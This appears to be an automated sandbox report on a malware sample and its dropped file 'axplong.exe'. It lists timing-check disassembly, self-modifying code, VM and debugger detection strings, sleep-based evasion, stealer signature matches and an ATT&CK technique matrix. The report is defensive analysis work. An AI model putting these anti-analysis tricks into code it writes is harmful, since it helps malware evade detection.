                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC071E second address: 4AC078A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9D1073AE79h 0x00000011 add ah, FFFFFF86h 0x00000014 jmp 00007F9D1073AE71h 0x00000019 popfd 0x0000001a movzx eax, bx 0x0000001d popad 0x0000001e and esp, FFFFFFF8h 0x00000021 pushad 0x00000022 call 00007F9D1073AE79h 0x00000027 mov bx, ax 0x0000002a pop esi 0x0000002b mov edi, 20D2FE70h 0x00000030 popad 0x00000031 push ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC078A second address: 4AC078E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC078E second address: 4AC0794 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0794 second address: 4AC07A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D106F765Fh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC07A7 second address: 4AC07D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b jmp 00007F9D1073AE75h 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9D1073AE6Dh 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC07D7 second address: 4AC07E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D106F765Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC07E7 second address: 4AC07EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC07EB second address: 4AC0824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9D106F765Eh 0x0000000e xchg eax, esi 0x0000000f jmp 00007F9D106F7660h 0x00000014 mov esi, dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F9D106F765Ah 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0824 second address: 4AC0833 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0833 second address: 4AC0839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0839 second address: 4AC083D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC083D second address: 4AC085F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9D106F7663h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC085F second address: 4AC08BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9D1073AE6Fh 0x00000009 and ax, 72AEh 0x0000000e jmp 00007F9D1073AE79h 0x00000013 popfd 0x00000014 mov ah, BBh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test esi, esi 0x0000001b jmp 00007F9D1073AE73h 0x00000020 je 00007F9D82BA0949h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov eax, ebx 0x0000002b mov cx, bx 0x0000002e popad 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0A17 second address: 4AC0A38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F765Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D106F765Dh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0A38 second address: 4AC0A3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0A3E second address: 4AC0A54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov al, 78h 0x0000000c mov ebx, 22C27EF4h 0x00000011 popad 0x00000012 xchg eax, ebx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0A54 second address: 4AC0A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0A5D second address: 4AC0AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push dword ptr [ebp+14h] 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F9D106F7666h 0x00000010 jmp 00007F9D106F7665h 0x00000015 popfd 0x00000016 push ecx 0x00000017 jmp 00007F9D106F7667h 0x0000001c pop esi 0x0000001d popad 0x0000001e push dword ptr [ebp+10h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F9D106F7661h 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0AC6 second address: 4AC0ADB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0ADB second address: 4AC0AE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0019 second address: 4AE006D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 41B54762h 0x00000008 mov ah, dl 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 mov cl, 7Ch 0x00000014 popad 0x00000015 pushfd 0x00000016 jmp 00007F9D1073AE79h 0x0000001b sub ah, FFFFFFE6h 0x0000001e jmp 00007F9D1073AE71h 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F9D1073AE6Ch 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE006D second address: 4AE007F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D106F765Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE007F second address: 4AE00E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov ch, dh 0x0000000c pushfd 0x0000000d jmp 00007F9D1073AE76h 0x00000012 or ax, F118h 0x00000017 jmp 00007F9D1073AE6Bh 0x0000001c popfd 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 jmp 00007F9D1073AE76h 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F9D1073AE77h 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B507B0 second address: 4B50826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F765Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9D106F7666h 0x0000000f push eax 0x00000010 jmp 00007F9D106F765Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F9D106F7666h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F9D106F765Dh 0x00000026 sbb ax, C756h 0x0000002b jmp 00007F9D106F7661h 0x00000030 popfd 0x00000031 mov ebx, ecx 0x00000033 popad 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50826 second address: 4B5082B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40A59 second address: 4B40A5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40A5D second address: 4B40A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9D1073AE6Dh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40A74 second address: 4B40AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F7661h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 mov esi, 1F937BBFh 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b mov esi, 081BD28Dh 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40911 second address: 4B40917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE02FF second address: 4AE032D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 8Ch 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9D106F7666h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9D106F765Ah 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE032D second address: 4AE0333 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0333 second address: 4AE0339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40D31 second address: 4B40D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D1073AE6Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40D43 second address: 4B40D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40D47 second address: 4B40DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F9D1073AE77h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F9D1073AE76h 0x00000015 push dword ptr [ebp+0Ch] 0x00000018 pushad 0x00000019 mov bx, si 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007F9D1073AE78h 0x00000024 and ax, 9228h 0x00000029 jmp 00007F9D1073AE6Bh 0x0000002e popfd 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF084B second address: 4AF0851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF0851 second address: 4AF0855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF0855 second address: 4AF0859 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF099B second address: 4AF09EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f jmp 00007F9D1073AE70h 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F9D1073AE6Dh 0x0000001e adc ah, 00000026h 0x00000021 jmp 00007F9D1073AE71h 0x00000026 popfd 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF09EE second address: 4AF09F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F1EB45 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1140D10 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: FEEB45 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 1210D10 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B40CE5 rdtsc 0_2_04B40CE5
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1195Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1258Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1227Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 413Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1258Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2260Thread sleep time: -58029s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4136Thread sleep count: 1195 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4136Thread sleep time: -2391195s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6868Thread sleep count: 1258 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6868Thread sleep time: -2517258s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4996Thread sleep count: 1227 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4996Thread sleep time: -2455227s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6364Thread sleep count: 413 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6364Thread sleep time: -12390000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6264Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6120Thread sleep count: 1258 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6120Thread sleep time: -2517258s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: file.exe, 00000000.00000002.1803876885.00000000006C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: axplong.exe, 00000006.00000002.2996262320.0000000001617000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: file.exe, 00000000.00000002.1804442258.000000000109B000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.1841573429.000000000116B000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000002.00000002.1852289301.000000000116B000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: axplong.exe, 00000006.00000002.2996262320.00000000015E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B401BD Start: 04B40269 End: 04B401F10_2_04B401BD
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B40CE5 rdtsc 0_2_04B40CE5
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00FB645B mov eax, dword ptr fs:[00000030h]6_2_00FB645B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00FBA1C2 mov eax, dword ptr fs:[00000030h]6_2_00FBA1C2
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: /CProgram Manager
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F9D312 cpuid 6_2_00F9D312
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F9CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,6_2_00F9CB1A
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F865B0 LookupAccountNameA,6_2_00F865B0

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.file.exe.eb0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.axplong.exe.f80000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.axplong.exe.f80000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.axplong.exe.f80000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.1852188803.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1804337968.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.2320957202.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.1811913047.0000000005460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1841414182.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1800393603.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1763252380.0000000004930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter
                    1
                    Scheduled Task/Job
                    12
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    1
                    Scheduled Task/Job
                    251
                    Virtualization/Sandbox Evasion
                    LSASS Memory741
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    12
                    Process Injection
                    Security Account Manager2
                    Process Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information
                    NTDS251
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput Capture11
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    Account Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                    System Owner/User Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    File and Directory Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow224
                    System Information Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
